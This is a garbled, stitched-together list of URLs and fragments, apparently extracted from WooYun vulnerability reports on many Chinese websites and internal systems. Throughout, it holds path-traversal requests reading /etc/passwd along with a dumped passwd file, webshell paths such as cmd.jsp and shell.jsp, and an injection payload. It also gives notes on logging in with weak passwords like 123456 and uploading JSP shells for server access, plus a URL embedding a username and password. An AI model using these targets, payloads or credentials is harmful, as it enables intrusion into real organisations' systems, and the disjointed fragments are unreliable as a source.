http://cc.bnchina.com/newsdetails.aspx?id=94 http://jl.bnchina.com/newsdetails.aspx?id=94 http://channels.wandoujia.com/Android http://channels.wandoujia.com/Android/daily?action=b3V0&num=MTI=&id=MTYzMw== http://channels.wandoujia.com/Android/daily?action=b3V0&num=OA==&id=MTU2OQ== http://channels.wandoujia.com/Android/daily?action=b3V0&num=NA==&id=NzUz http://channels.wandoujia.com/Android/daily?action=b3V0&num=Mw==&id=Njc3 http://channels.wandoujia.com/Android/daily?action=b3V0&num=Ng==&id=MTQwMw== http://channels.wandoujia.com/Android/daily?action=b3V0&num=MjA=&id=MTU5NQ== http://**.**.**.**:80/ http://cn.gpspax.com/loginRCZX.aspx http://**.**.**.**/index.aspx http://**.**.**.**/index.aspx?id=42041&n=ZHANGPENG&p=GU2S0P251db0104 http://**.**.**.**:80/ http://**.**.**.**/soft/34970.htm http://111.4.123.233/ http://**.**.**.**/shownews.php?ID=787 http://**.**.**.**/console/login/LoginForm.jsp http://**.**.**.**/test/da.jsp jdbc:oracle:thin:@localhost:1521/orcl http://shop.kingsun.cn/到处都是注入,而且还爆错 http://**.**.**.**/bugs/wooyun-2010-0135197 http://**.**.**.**/public/Project/ProjectInfo.aspx?code=259002&lcode=430369 http://ts.kuwo.cn/.git/ http://**.**.**.**/user/Reg.aspx),填入手机号(18600008888)、任意验证码(123456)、邮箱等信息,提交。 http://112.87.43.215:8020/ http://**.**.**.** http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/File http://**.**.**.**/Specialreport.jsp?t_id=946&tableName=bd_xinwe241 http://**.**.**.**/newcontent.jsp?messId=1239&tableName=bd_xinwe241 http://**.**.**.**/manage/infordisclosure/topicdetails.jsp?map=y&messId=27&tableName=bd_xinxi648 http://**.**.**.**/law_details.jsp?id=10021&diccode=1002 http://**.**.**.**/sdmessage.jsp?messId=117&tableName=bd_shand306 http://**.**.**.**/ http://**.**.**.**/dc/admin/index.asp http://**.**.**.**/dc//inc/config.asp jdbc:oracle:thin:@**.**.**.**:1521/orcl http://**.**.**.**:86/zjz/peixun/Banci.do?method=xuzhi&banciId=441&userId=&year=2015&flag=all http://**.**.**.**/star/index.php?type=3 http://www.job168.com/df/index.jsp?title=%EF%BF%BD%EF%BF%BD%CD%B7 http://www.job168.com/df/index.jsp?title=%EF%BF%BD%EF%BF%BD%CD%B7 http://bbs.job168.com/df/index.jsp?title=%B6%AB%DD%B8 http://hz.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://hz.job168.com/train/searchresult.jsp?course_type=A0000 http://**.**.**.**/ http://**.**.**.**/news/details.do?id=e6c417c5-ab94-4dd1-d1b6-36a740eb5ca0 http://**.**.**.**:8888/esale/news.action存在命令执行漏洞 http://api.ffan.com/film/v2/film/lists?cityNo=320100&imei=525af1deaf994570ae27070eb4b8b0f064d3ef4c&userId=15000000009411631&version=1&wdId=db9f5185ab0beb3c4b6ea459952918c2&FFClientVersion=21010&ddId=525af1deaf994570ae27070eb4b8b0f064d3ef4c&FFClientType=2&publishStatus=1 http://**.**.**.**/whir_system/Default.aspx# http://**.**.**.**/bugs/wooyun-2010-057764 http://**.**.**.**/uploadfiles/20151011025928865.asp http://**.**.**.**/unit/list.asp?uid=29 http://**.**.**.**/zhengfawang/login.asp http://m.qmango.com/travel/searchresult?pclass=0&sortby=1&sortdir=0&ss=-1&ty= http://epaper.uestc.edu.cn/admin/login http://epaper.uestc.edu.cn/admin/ http://epaper.uestc.edu.cn/admin/ http://**.**.**.**/ http://**.**.**.**:7001/console/login/LoginForm.jsp http://**.**.**.**/qyks/Dcard.asp http://**.**.**.**:7002/console/login/LoginForm.jsp root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin uuidd:x:101:104:UUID daemon:/var/lib/libuuid:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin oracle:x:500:500::/home/oracle:/bin/bash http://222.75.160.45/ http://www.metromall.cn/)账户口令可被任意重置。 http://www.metromall.cn//user/forgot_pw_one.aspx)。 http://**.**.**.**/GE/GE/default.aspx(復興航空B2B系統) http://**.**.**.**/GE/GE/PG/HE/HEP2/HEP2B0/HEP2B0.aspx?AJAX=1&do_action=agt_cd_check&agt_cd=dsfsd*&acct_no=aa&_ele_list=XML&time=1444493269143 http://**.**.**.**:8088/unismEtm/login_val.action http://**.**.**.**:8084/unismEtm/login_val.action http://**.**.**.**:8092/unismLtk/login_val.action http://**.**.**.**:8080/unismOPS/login_val.action http://**.**.**.**/caiotAqu/login_val.action http://**.**.**.**/ http://**.**.**.**/caiotLiv/login_val.action http://**.**.**.**/caiotAqu/login_val.action http://**.**.**.**/caiotAqu/login_val.action http://**.**.**.**/caiotAqu/shell.jsp http://**.**.**.**/caiotAqu/ma.jsp http://**.**.**.**:8092/unismLtk/login_val.action http://**.**.**.**:8092/unismLtk/caac.jsp https://**.**.**.**/treejames/uninetOps/blob/d68489b97c51b723f8f4ebbda79d80391f7b53c5/WebRoot/WEB-INF/classes/application.properties jdbc:mysql://localhost:3306/tt http://**.**.**.**/bugs/wooyun-2015-0145964/trace/bc9f3329aff4b653b44137a8f62542c8 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2010-057764下载到数据库配置文件,可得到数据库链接信息: http://3gapi.baidukanshu.com:7778 http://**.**.**.**/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.**/OA/ http://**.**.**.** http://**.**.**.** http://**.**.**.**/ http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**:8888/dm_listg.action存在命令执行漏洞 http://**.**.**.**/bugs/wooyun-2015-0136114 http://**.**.**.**/manager/login.cfm地址, http://**.**.**.**/ http://**.**.**.**/newtvuser_eng/index1.cfm http://**.**.**.**/newtvuser/index1.cfm http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**//index.phpcate_id=13&m=Article&temp=../../../../../../../../../../etc/passwd https://sl.zte.com.cn/ssologin.action存在心脏滴血漏洞 http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen jdbc:oracle:thin:@**.**.**.**:1521:orcl http://fix.zealer.com/home/record?id=2570&type=re http://218.2.113.254/ http://fapp.cnhubei.com/wall_wsjb/index.php?wtype=1 http://www.goshare2.com/reset-password http://t.qianbao666.com/api/resources/action/announcement-detail.htm?id=56853 http://t.qianbao666.com/api/resources/action/announcement-detail.htm?id=??? http://t.qianbao666.com/api/resources/action/announcement-detail.htm?id=142002 http://t.qianbao666.com/api/resources/action/announcement-detail.htm?id=142006 http://**.**.**.**/icarttw/getSpxx.action?flid=1725&page=1&type=4 http://**.**.**.**/icarttw/getInfo.action?splx=1&spxxid=755026091&type=1 http://**.**.**.**/icarttw/listwsjg.action?zz=&cbsmc=&flags=&flag=10&flagc=&fxflid=0205060000&page=1 http://**.**.**.**/下面列出了一堆演示网站及账号密码 http://**.**.**.**/bugs/wooyun-2010-0139696 http://bjeos.tj.**.**.**.** http://**.**.**.**): http://**.**.**.**/manage/login.asp http://**.**.**.**/admin/admin.php http://yoollo.tj.**.**.**.**/manage.html http://ihomef.tj.**.**.**.**/manager.html?action=login jdbc:oracle:thin:@**.**.**.**:1521:yzfpt http://**.**.**.**/tips_about.php?news_id=126&pageid=1&Language=traditional http://**.**.**.**/tips_about.php?news_id=126&pageid=1&Language=traditional http://gkcf.dzwww.com:80/ http://**.**.**.**/news/show.asp?id=2605 http://**.**.**.**/news/show.asp?id=2605 http://a.chemao.com.cn/admin/index.php http://a.chemao.com.cn/admin/index.php?app=user http://a.chemao.com.cn/admin/index.php?app=admin&page=11 http://a.chemao.com.cn/admin/index.php?app=car&act=index&status=3&page=2 http://erp.dongdalou.com/index.php http://**.**.**.**/TuniS/**.**.**.**/press/main.php?id=1208 http://**.**.**.**/TuniS/**.**.**.**/press/main.php?id=1208 http://**.**.**.**/TuniS/**.**.**.**/press/main.php?id=1208 http://www.cetools.cn/index.php/cetools/login http://**.**.**.**/upload_files/ http://**.**.**.**/upload_files/file/ http://**.**.**.**/admin/index.php?msg=1001 http://118.122.88.90:60465/ http://**.**.**.**/include/css_out.php?css=main http://**.**.**.**/swj/kjfw/news/kyyydw/dwFrame.jsp?type=/WEB-INF/web.xml http://www.0755tt.com/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://project.himin.net:8080/web/index.php net:8080 http://**.**.**.**:8080/seeyon/index.jsp http://**.**.**.**/tc_chi/whatsnew/consultation.php?id=318 http://**.**.**.**/tc_chi/whatsnew/briefing.php?id=316 http://qcrc.**.**.**.**/phpinfo.php http://www.haoyicn.cn/admin/ Injection:http://**.**.**.**/jw_home/news_info.jsp?item_id=0202&article_id=140612946041 http://service.hundsun.com:8180/secure/Dashboard.jspa,可以注册新用户。 http://114.215.173.137:8190/,可以用上面的账号和密码登录。仍旧是一些无用的信息。 http://**.**.**.**/wwwroot.rar http://www.iqegg.com/.git/config http://www.iqegg.com/flow.php http://**.**.**.**/bugs/wooyun-2015-0136013 https://member.zhaogang.com/member/Password.aspx http://**.**.**.**/gbsnews.asp?id=168502 http://**.**.**.**/gbsnews.asp?id=168502 http://act.midea.com/kt30year/site/action.php?act=like&class= http://123.57.231.146:808 http://**.**.**.**/,但看了下没什么大的漏洞,就果断切换C段,然后找到这个服务器:**.**.**.**:8003/ http://mobile.chinaiiss.com/strategy/v3/user/set_userinfo https://github.com/Alex2006/ShortMessage/blob/9bcfd587a798f52e1d7c1d69194f3c0c0e3718c9/ShortMessage/MailManager.cs http://www.dfpv.com.cn/fs/pressroom_reg.html http://**.**.**.**/ https://**.**.**.**/admin/login.jsp https://**.**.**.**/admin/doCheckLogi https://**.**.**.**/admin/login.jsp http://zhaopin.gwm.cn:3680/job/ http://zhaopin.gwm.cn:3580/ http://**.**.**.**/ http://www.cwan.com/ www.imbagame.com http://www.cwan.com/ http://weixin.wxcrg.com.cn/xapp/ http://cms.jushanghui.com:80/processLogin.shtml?&redirect:xxx${13579246-1 http://www.pangmao56.com/AppMeet.aspx url:http://www.sinodtc.com/admin/index.aspx http://www.sinodtc.com/Company_news.aspx?id=2 http://221.195.68.213/login.aspx http://221.195.68.213/OA/RecieveDocument/RecDocSearch.aspx http://101.227.9.191:81 http://101.227.9.190:81 http://101.227.9.188:81 http://101.227.9.189:81 http://101.227.9.188:81/products.php?act=eidt&id=1 http://**.**.**.**:8000 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2015-0136281 http://bj.feiren.com/)的时候,发现页面下方有个APP下载,于是检测了一下。 http://m.cococ.cc/xfirews/faq http://122.224.251.229/ http://**.**.**.**/CMS/cms.rar http://**.**.**.**/MemMan/main.aspx http://**.**.**.** http://**.**.**.**/UserServlet?i=1&action=login http://**.**.**.**/UserServlet?i=1&action=login URL:http://mail.yto.net.cn/#1 http://wvw.9377.com/register.php http://**.**.**.**/bugs/wooyun-2010-0146042有个邮箱账户包含一个vpn账户 http://**.**.**.**/bugs/wooyun-2010-0146042里邮箱账户登录,如下: http://**.**.**.**/video_content.php?id=8 http://**.**.**.**/jnjj/ http://wooyun.org/bugs/wooyun-2010-0101271 http://api.passport.pptv.com/dologin.do http://sinopecvm.lyodssoft.com/Sinopec/index.htm http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/hello.txt http://**.**.**.**/hello.asp;.txt http://**.**.**.**/ http://**.**.**.**/products/index.php?users_id=1248 http://**.**.**.**/products/index.php?users_id=1248 http://**.**.**.**:8000 http://**.**.**.**:8000/question/attach.upload http://**.**.**.**/PortInfo/,新系统http://**.**.**.**/dataportal http://**.**.**.**/dataportal/query.do?qn=dp_select_message&id=402803cf4d41f869014e2f3aa87e0064 http://www.hs-post.com/,官网介绍如下: www.hs-post.com http://www.hs-post.com http://www.hs-post.com/igenus/login.php?Cmd=error&Code=-1 www.bendibao.com www.bendibao.com::webshequ/test/ http://shequ.sz.bendibao.com/test/1.php http://122.224.251.229/ http://122.224.251.229/question/attach.upload http://**.**.**.**/disact.php?fid=70&id=643 http://**.**.**.**/disact.php?fid=70&id=642 http://**.**.**.**/admin http://s.haier.com/haierproject/saas/aaa.php?q=3458115 http://113.106.61.40:8089/zindex.jsp http://113.106.61.40:8089/myname/cmd.jsp http://authors.cnhubei.com/Reg.html http://authors.cnhubei.com/Model/AUTHORS/CheckUserManage.aspx?PageMenuID=11001 http://authors.cnhubei.com/index.aspx http://bus.satrip.com/Login.aspx http://bus.satrip.com http://**.**.**.**/index.php?ac=article&at=list&tid=151 http://**.**.**.**/ http://**.**.**.**:8000/ http://**.**.**.**/bugs/wooyun-2010-0108559,发现上传数据包中一个关键参数uploadnexturl,试探下得到漏洞POC http://**.**.**.**/question/attach.upload http://**.**.**.** http://www.chinaiiss.com/adclick.php?id=3782 http://www.vcanbio.com/investor_articledetail.aspx?id=1'%22 http://bbs.2345.cn/ https://**.**.**.** http://**.**.**.**/produce/cpxx_rlzy.htm http://**.**.**/rlweb/_data/rule.aspxid=1_ http://**.**.**/rlweb/_data/rule.aspxid=1_ http://**.**.**/_data/rule.aspxid=1_ http://**.**.**.**/football/common/proxy/rate-your-players-xml.aspx?uniqueMatchCode=43923 http://**.**.**.**/football/common/proxy/rate-your-players-xml.aspx?uniqueMatchCode=43923 http://**.**.**.**:8888/HyperLink/warehouse_msg_01.aspx?type=A&no= http://**.**.**.**:10088/HyperLink/warehouse_msg_01.aspx?type=A&no= https://**.**.**.**/question/tag?tagid=12 http://**.**.**.**/ http://**.**.**.**/ http://ebooking.lvmama.com/vst_ebooking/ebooking/announcement/announcementFiledownLoad.do?fileId=6619365 http://ebooking.lvmama.com/vst_ebooking/ebooking/advice/findEbkAdviceContentList.do?subjectId=2 http://**.**.**.**/weboa/webpage.nsf,如图所示: http://in.satrip.com/Login.asp http://user.goodbaby.com主站登录接口无验证码无限制用户名和密码都是明文传输的 http://**.**.**.**/manager/login.cfm http://**.**.**.**/manager/login.cfm http://**.**.**.**/index/index.jsp,中国烟草安徽中烟协同办公平台,可用常用用户名和弱口令进行撞库,获得三个有效账号,登陆后可查看内部敏感信息,在“发文拟稿”的“上传附件”处可以上传jsp大马获取shell(服务器应该有杀毒软件,一般的一句话木马无法成功连接)。 site:gitlab.365ime.com http://im.suning.com/ http://**.**.**.**/henan/tags.aspx?tag=%D6%A3%D6%DD http://**.**.**.**/ http://qingdao.liebiao.com/xiaoqu/?q= http://sqlmap.org http://**.**.**.**/defaultroot/login.jsp,中国烟草山西昆明烟草有限责任公司协同办公系统,登陆处可用常用用户名及弱口令123456获得一个有效账号。登陆后可查看公文、邮件、档案文件、公司通讯录等等敏感信息,在右上角“在线人数”处,疑似存在sql注入,但好像对输入字符长度进行了限制; http://**.**.**.**/console/login/LoginForm.jsp,存在weblogic弱口令12345678,登陆后可部署war包,发现前人留马痕迹。 http://210.21.81.169/ http://210.21.81.169/Login.aspx http://sqlmap.org http://**.**.**.**/web/vote_response.asp android:allowBackup参数值为"true",这样配置无需ROOT可通过adb备份应用数据 http://km.chinadrtv.com/homepage/LoginHomepage.jsp?hpid=21 http://mall.jzq001.com/plugin.php?id=mall&type=shop_cont&itemid=1619 http://**.**.**.**/sungov/viewReportingServices.do?bod001=W9000058567 http://218.57.11.80:80/zxzqsd/cn/job/shownotice.aspx?newsid=1经过sqlmap判断为dba http://**.**.**/index.aspnodeid=4167&newsid=23897&ly=content_ http://**.**.**/dzb/index.aspid=15&ly=content&nodeid=57&newsid=251_ http://**.**.**/index.aspnewsid=5297&nodeid=1451&ly=content_ http://**.**.**/dzb/index.aspnodeid=32&newsid=56&ly=content_ http://**.**.**/index.aspnewsid=5006&nodeid=1185&ly=content_ http://**.**.**/index.aspnodeid=1522&newsid=6473&ly=content_ http://**.**.**/index.aspnodeid=1575&newsid=7622&ly=content_ http://**.**.**/index.aspnodeid=1396&newsid=5029&ly=content_ http://**.**.**/index.aspnodeid=3220&newsid=10187&ly=content_ http://**.**.**/new/jxkjsf/index.aspnodeid=1613&newsid=7301&ly=content_ http://**.**.**/index.aspnodeid=1134&newsid=4300&ly=content_ http://**.**.**/paper/index.aspid=269&nodeid=1093&newsid=3998&ly=content_ http://**.**.**/index.aspnodeid=1729&newsid=56290&ly=content_ http://**.**.**/xgxb/index.aspnodeid=4494&newsid=18170&ly=content_ http://**.**.**/index.aspnodeid=4092&newsid=26362&ly=content_ http://**.**.**/index.aspnodeid=1245&newsid=5743&ly=content_ http://**.**.**/index.aspnodeid=3200&newsid=10127&ly=content_ http://**.**.**/index.aspnodeid=1167&newsid=4521&ly=content_ http://**.**.**/index.aspnodeid=1838&newsid=8221&ly=content_ http://**.**.**/index.aspnodeid=1499&newsid=7455&ly=content_ http://**.**.**/index.aspnodeid=1323&newsid=5294&ly=content http://rxhzw.76ju.com/?action=detail&id=4680 http://xyfm.76ju.com/?action=detail&id=4422 http://wssb.76ju.com/?action=detail&id=2966 http://**.**.**.**/201314_hist4312ps.html?id=1705 http://**.**.**.**/cuscs/search/srch_by_index.php?lang=tc&acad_code=gc&is_abp=0 Injection:http://**.**.**.**/edb/index.php/en/home?option=com_courses&task=prog_info&progId=3CC0CFC7-4EBF-4AC5-AD81-6B544447BA34 http://**.**.**.**//page/maint/login/Page.jsp?templateId=18 http://s.bdmob.cn/huodong/shuju.asp?hid=226&bid=514 https://member.zhaogang.com/member/Password.aspx http://dsp.gome.com.cn/ http://**.**.**.**/yjsjwgl/qt/cktz.do?tzxh=772 http://**.**.**.**/artlist.do?id=2 http://**.**.**.**/artlist.do?ID=15 http://**.**.**.**/artlist.do?ID=15 http://**.**.**.**//artlist.do?ID=15 http://ty.top.99.com/userlevel.aspx?pro=20 http://m.ahic.com.cn/wxpt/claimsSeachAction.do http://www.51766.com/www2009/dujia/search.jsp?startAdd_name=%E9%98%B3%E6%B1%9F%E7%9F%B3%E8%A7%89%E5%AF%BA&linetype=5&ent_id=bjql&minPrice=10000&pageNo=1 http://58.251.6.92/web_login/login.aspx http://**.**.**.**/report/login.asp http://119.0.139.54:8080/index.action http://**.**.**.**/gl/pl5/ http://222.241.161.196:8088/login.action http://222.241.161.196:8088/login.action http://**.**.**.**/help/downfile.jsp?fileName=denglubiao http://**.**.**.**//common/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../../../../ http://**.**.**.**/cscecGuidang/searchGuidangList.action?search=true http://**.**.**.**/cscecGuidang/searchGuidangList.action?search=true http://www.qu.cn/app/android/100/user_order.php?act=detail&id=1301432 http://www.qu.cn/app/android/100/user_order.php?act=detail&id=1101432 http://www.qu.cn/app/android/100/user_order.php?act=detail&id=111432 www.zhujiwu.com/usercenter/service/gd_add.asp/1.php www.zhujiwu.com/usercenter/cmd/gd_cmd.asp/1.php www.zhujiwu.com/inc/show_img.asp?file_path=d:/wwwroot/upload/../global/Function.asp http://dz.loupan.com/index.php?apartments=0&area=1&c=house&decorate=0&existing=0&feature=0&keywords=&m=get_house_combox_list&page=1&price=0&property=0&state=0&subway=0 http://admin.1jiajie.com/v2/index.php?action=login&do=auth http://www.bj-gem.com.cn/ http://pmcm.bj-gem.com.cn/upload/downloadfile.aspx?DocGUID=65d4f4f1-4851-44d0-9cf4-495fe84afcd2* http://zhiyuan.edu.sina.com.cn/index.php?a=../../../../../../../../../../etc/passwd%00&p=zhiyuan2015&s=solution inurl:newsMsg.php?newsno= http://**.**.**.**/newsMsg.php?newsno=2 http://**.**.**.**/newsMsg.php?newsno=276 http://**.**.**.**/newsMsg.php?newsno=393 http://**.**.**.**/newsMsg.php?newsno=194 http://**.**.**.**/newsMsg.php?newsno=328 http://mceair.962008.com/ROUTE/Default.aspx?keyword=%u666E%u5409%u5C9B&KeyChannelType= mceair.962008.com/Control/Destination.aspx http://app.qu.cn/ http://scm.beequick.cn/ware/ test:123456 http://**.**.**.**:8383 http://**.**.**.**:8383/ewebeditor/admin/default.jsp http://223.94.80.136:8085/ http://www.pinjiu.com/ http://www.pinjiu.com/user.php?act=get_password https://121.15.129.252/ http://**.**.**.**/channels/4.html POST:user_name= http://**.**.**.**:5080/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://qhmu.cf/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/viewgood/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**:8082/viewgood/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/viewgood/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**:8000/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check http://**.**.**.**/VIEWGOOD/Pc/Content/Request.aspx?action=name_check POST:UserGUID=1 http://**.**.**.**:5080/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://qhmu.cf/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/viewgood/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**:8082/viewgood/ADI/portal/UserDataSync.aspx http://**.**.**.**/viewgood/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**:8000/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/VIEWGOOD/ADI/portal/UserDataSync.aspx http://**.**.**.**/channels/4.html http://**.**.**.**:5080/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://qhmu.cf/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/viewgood/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**:8082/viewgood/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/viewgood/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**:8000/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://**.**.**.**/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1&AssetID=1&CaptionName=1 http://bbs.gome.com.cn/ http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 